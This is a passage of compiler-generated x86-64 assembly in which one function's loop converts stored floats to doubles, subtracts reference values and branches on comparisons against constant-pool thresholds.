ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jne LBB1_454
jp LBB1_454
LBB1_235: ## in Loop: Header=BB1_8 Depth=1
movss -40(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -60(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_6(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.236: ## in Loop: Header=BB1_8 Depth=1
movss -64(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -60(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_10(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.237: ## in Loop: Header=BB1_8 Depth=1
movss -168(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -60(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_0(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.238: ## in Loop: Header=BB1_8 Depth=1
movss -112(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -60(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_9(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.239: ## in Loop: Header=BB1_8 Depth=1
movss -56(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -60(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_17(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.240: ## in Loop: Header=BB1_8 Depth=1
movss -144(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -60(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_1(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.241: ## in Loop: Header=BB1_8 Depth=1
movss -128(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -60(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_2(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.242: ## in Loop: Header=BB1_8 Depth=1
movss -120(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -60(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_13(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.243: ## in Loop: Header=BB1_8 Depth=1
movss -96(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -60(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_2(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.244: ## in Loop: Header=BB1_8 Depth=1
movss -72(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -60(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_16(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.245: ## in Loop: Header=BB1_8 Depth=1
movss -40(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -60(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_6(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_246
jp LBB1_246
jmp LBB1_255
LBB1_246: ## in Loop: Header=BB1_8 Depth=1
movss -64(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -60(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_10(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_247
jp LBB1_247
jmp LBB1_255
LBB1_247: ## in Loop: Header=BB1_8 Depth=1
movss -168(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -60(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_0(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_248
jp LBB1_248
jmp LBB1_255
LBB1_248: ## in Loop: Header=BB1_8 Depth=1
movss -112(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -60(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_9(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_249
jp LBB1_249
jmp LBB1_255
LBB1_249: ## in Loop: Header=BB1_8 Depth=1
movss -56(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -60(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_17(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_250
jp LBB1_250
jmp LBB1_255
LBB1_250: ## in Loop: Header=BB1_8 Depth=1
movss -144(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -60(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_1(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_251
jp LBB1_251
jmp LBB1_255
LBB1_251: ## in Loop: Header=BB1_8 Depth=1
movss -128(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -60(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_2(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_252
jp LBB1_252
jmp LBB1_255
LBB1_252: ## in Loop: Header=BB1_8 Depth=1
movss -120(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -60(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_13(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_253
jp LBB1_253
jmp LBB1_255
LBB1_253: ## in Loop: Header=BB1_8 Depth=1
movss -96(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -60(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_2(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_254
jp LBB1_254
jmp LBB1_255
LBB1_254: ## in Loop: Header=BB1_8 Depth=1
movss -72(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -60(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_16(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jne LBB1_454
jp LBB1_454
LBB1_255: ## in Loop: Header=BB1_8 Depth=1
movss -176(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -156(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_2(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.256: ## in Loop: Header=BB1_8 Depth=1
movss -184(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -156(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_18(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.257: ## in Loop: Header=BB1_8 Depth=1
movss -40(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -156(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_9(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.258: ## in Loop: Header=BB1_8 Depth=1
movss -152(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -156(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_1(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.259: ## in Loop: Header=BB1_8 Depth=1
movss -160(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -156(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_9(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.260: ## in Loop: Header=BB1_8 Depth=1
movss -136(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -156(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_0(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.261: ## in Loop: Header=BB1_8 Depth=1
movss -72(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -156(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_17(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.262: ## in Loop: Header=BB1_8 Depth=1
movss -88(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -156(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_4(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.263: ## in Loop: Header=BB1_8 Depth=1
movss -96(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -156(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_9(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.264: ## in Loop: Header=BB1_8 Depth=1
movss -104(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -156(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_5(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.265: ## in Loop: Header=BB1_8 Depth=1
movss -176(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -156(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_2(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_266
jp LBB1_266
jmp LBB1_275
LBB1_266: ## in Loop: Header=BB1_8 Depth=1
movss -184(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -156(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_18(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_267
jp LBB1_267
jmp LBB1_275
LBB1_267: ## in Loop: Header=BB1_8 Depth=1
movss -40(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -156(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_9(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_268
jp LBB1_268
jmp LBB1_275
LBB1_268: ## in Loop: Header=BB1_8 Depth=1
movss -152(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -156(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_1(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_269
jp LBB1_269
jmp LBB1_275
LBB1_269: ## in Loop: Header=BB1_8 Depth=1
movss -160(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -156(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_9(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_270
jp LBB1_270
jmp LBB1_275
LBB1_270: ## in Loop: Header=BB1_8 Depth=1
movss -136(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -156(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_0(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_271
jp LBB1_271
jmp LBB1_275
LBB1_271: ## in Loop: Header=BB1_8 Depth=1
movss -72(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -156(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_17(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_272
jp LBB1_272
jmp LBB1_275
LBB1_272: ## in Loop: Header=BB1_8 Depth=1
movss -88(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -156(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_4(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_273
jp LBB1_273
jmp LBB1_275
LBB1_273: ## in Loop: Header=BB1_8 Depth=1
movss -96(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -156(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_9(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_274
jp LBB1_274
jmp LBB1_275
LBB1_274: ## in Loop: Header=BB1_8 Depth=1
movss -104(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -156(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_5(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jne LBB1_454
jp LBB1_454
LBB1_275: ## in Loop: Header=BB1_8 Depth=1
movss -176(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -116(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_1(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.276: ## in Loop: Header=BB1_8 Depth=1
movss -184(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -116(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_12(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.277: ## in Loop: Header=BB1_8 Depth=1
movss -40(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -116(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_14(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.278: ## in Loop: Header=BB1_8 Depth=1
movss -32(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -116(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_18(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.279: ## in Loop: Header=BB1_8 Depth=1
movss -112(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -116(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_17(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.280: ## in Loop: Header=BB1_8 Depth=1
movss -152(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -116(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_12(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.281: ## in Loop: Header=BB1_8 Depth=1
movss -48(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -116(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_18(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.282: ## in Loop: Header=BB1_8 Depth=1
movss -160(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -116(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_0(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.283: ## in Loop: Header=BB1_8 Depth=1
movss -192(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -116(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_9(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.284: ## in Loop: Header=BB1_8 Depth=1
movss -120(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -116(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_6(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.285: ## in Loop: Header=BB1_8 Depth=1
movss -176(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -116(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_1(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_286
jp LBB1_286
jmp LBB1_295
LBB1_286: ## in Loop: Header=BB1_8 Depth=1
movss -184(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -116(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_12(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_287
jp LBB1_287
jmp LBB1_295
LBB1_287: ## in Loop: Header=BB1_8 Depth=1
movss -40(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -116(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_14(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_288
jp LBB1_288
jmp LBB1_295
LBB1_288: ## in Loop: Header=BB1_8 Depth=1
movss -32(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -116(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_18(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_289
jp LBB1_289
jmp LBB1_295
LBB1_289: ## in Loop: Header=BB1_8 Depth=1
movss -112(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -116(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_17(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_290
jp LBB1_290
jmp LBB1_295
LBB1_290: ## in Loop: Header=BB1_8 Depth=1
movss -152(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -116(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_12(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_291
jp LBB1_291
jmp LBB1_295
LBB1_291: ## in Loop: Header=BB1_8 Depth=1
movss -48(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -116(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_18(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_292
jp LBB1_292
jmp LBB1_295
LBB1_292: ## in Loop: Header=BB1_8 Depth=1
movss -160(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -116(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
